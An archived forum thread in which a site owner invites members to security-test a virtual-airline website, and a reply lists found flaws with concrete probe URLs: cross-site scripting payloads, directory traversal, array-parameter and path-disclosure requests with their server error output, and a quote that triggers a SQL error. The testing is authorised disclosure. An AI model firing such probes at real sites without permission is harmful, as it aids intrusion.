Jump to content

Vista Security!

Crew-Portal

By Crew-Portal
in Beta Test Your Stuff!

Recommended Posts

Crew-Portal Regular Member

Crew-Portal

Posted
Posted

Why did I call this post vista security? Check my website and find out! Can someone use SQL injection and try to register themself using SQL Injection. But Please dont register the other way I really dont want anyone signed up unless they are working for this airline! Thanks in advance and ya... have fun. Also if you do use SQL please dont drop any of my databases! Please!  :'(

Link to comment
https://forums.phpfreaks.com/topic/68538-vista-security/
Share on other sites
agentsteal Newbie

agentsteal

Posted
Posted

Array:

http://www.cmxva.com/index.php?page=flights&p[]

 

Array:

http://www.cmxva.com/index.php?page[]

 

Array:

http://www.cmxva.com/index.php?page=profile&call[]

 

Cross Site Scripting:

http://www.cmxva.com/index.php?page=<marquee>vulnerable</marquee>

 

Cross Site Scripting:

http://www.cmxva.com/index.php?page=flights&p="><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.cmxva.com/index.php?page=profile&call=<marquee><h1>vulnerable</marquee>

 

Directory Transversal:

http://www.cmxva.com/?page=../index

 

Full Path Disclosure:

http://www.cmxva.com/?page=../../

  Quote
Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(pages/../../.php) is not within the allowed path(s): (/home/cmxvaco/:/usr/lib/php:/usr/local/lib/php:/tmp) in /home/cmxvaco/public_html/index.php on line 149

 

Full Path Disclosure:

http://www.cmxva.com/?page=../forums/index

  Quote
Warning: include(./extension.inc) [function.include]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/forums/index.php on line 25

 

Warning: include() [function.include]: Failed opening './extension.inc' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/forums/index.php on line 25

 

Warning: include(./common.) [function.include]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/forums/index.php on line 26

 

Warning: include() [function.include]: Failed opening './common.' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/forums/index.php on line 26

 

Fatal error: Call to undefined function session_pagestart() in /home/cmxvaco/public_html/forums/index.php on line 31

 

Full Path Disclosure:

http://www.cmxva.com/index.php?page=flights&s[]

  Quote
Warning: Illegal offset type in /home/cmxvaco/public_html/pages/flights.php on line 86

 

Full Path Disclosure:

http://www.cmxva.com/?page=FsPgetflight

  Quote
Warning: require(FsPadmin/setting.php) [function.require]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/FsPgetflight.php on line 4

 

Fatal error: require() [function.require]: Failed opening required 'FsPadmin/setting.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/FsPgetflight.php on line 4

 

Full Path Disclosure:

http://www.cmxva.com/pages/account.php

  Quote
Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/account.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/account.php on line 2

 

Warning: Cannot modify header information - headers already sent by (output started at /home/cmxvaco/public_html/pages/account.php:2) in /home/cmxvaco/public_html/pages/account.php on line 7

 

Full Path Disclosure:

http://www.cmxva.com/pages/aircraft.php

  Quote
Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/aircraft.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/aircraft.php on line 2

 

Full Path Disclosure:

http://www.cmxva.com/pages/fleet.php

  Quote
Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/fleet.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/fleet.php on line 2

 

Full Path Disclosure:

http://www.cmxva.com/pages/FsPgetflight.php

  Quote
Warning: require(FsPadmin/setting.php) [function.require]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/FsPgetflight.php on line 4

 

Fatal error: require() [function.require]: Failed opening required 'FsPadmin/setting.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/FsPgetflight.php on line 4

 

Full Path Disclosure:

http://www.cmxva.com/pages/lost.php

  Quote
Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/lost.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/lost.php on line 2

 

Warning: Cannot modify header information - headers already sent by (output started at /home/cmxvaco/public_html/pages/lost.php:2) in /home/cmxvaco/public_html/pages/lost.php on line 7

 

Full Path Disclosure:

http://www.cmxva.com/pages/loa.php

  Quote
Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/loa.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/loa.php on line 2

 

Full Path Disclosure:

http://www.cmxva.com/pages/members.php

  Quote
Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/members.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/members.php on line 2

 

Full Path Disclosure:

http://www.cmxva.com/pages/postflight.php

  Quote
Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/postflight.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/postflight.php on line 2

 

Full Path Disclosure:

http://www.cmxva.com/pages/remove.php

  Quote
Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/remove.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/remove.php on line 2

 

Full Path Disclosure:

http://www.cmxva.com/pages/training.php

  Quote
Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/training.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/training.php on line 2

 

Includes Directory:

http://www.cmxva.com/pages/

 

Maximum Length:

If you edit the input boxes when you register you can remove the maximum lengths.

 

SQL Error:

http://www.cmxva.com/index.php?page=profile&call='

  Quote
A fatal MySQL error occured.

Query: SELECT * FROM flights WHERE PilotName = 'CMX-\'' ORDER BY FlightDate LIMIT 0,50

Error: (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Link to comment
https://forums.phpfreaks.com/topic/68538-vista-security/#findComment-344617
Share on other sites

Archived

This topic is now archived and is closed to further replies.

Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.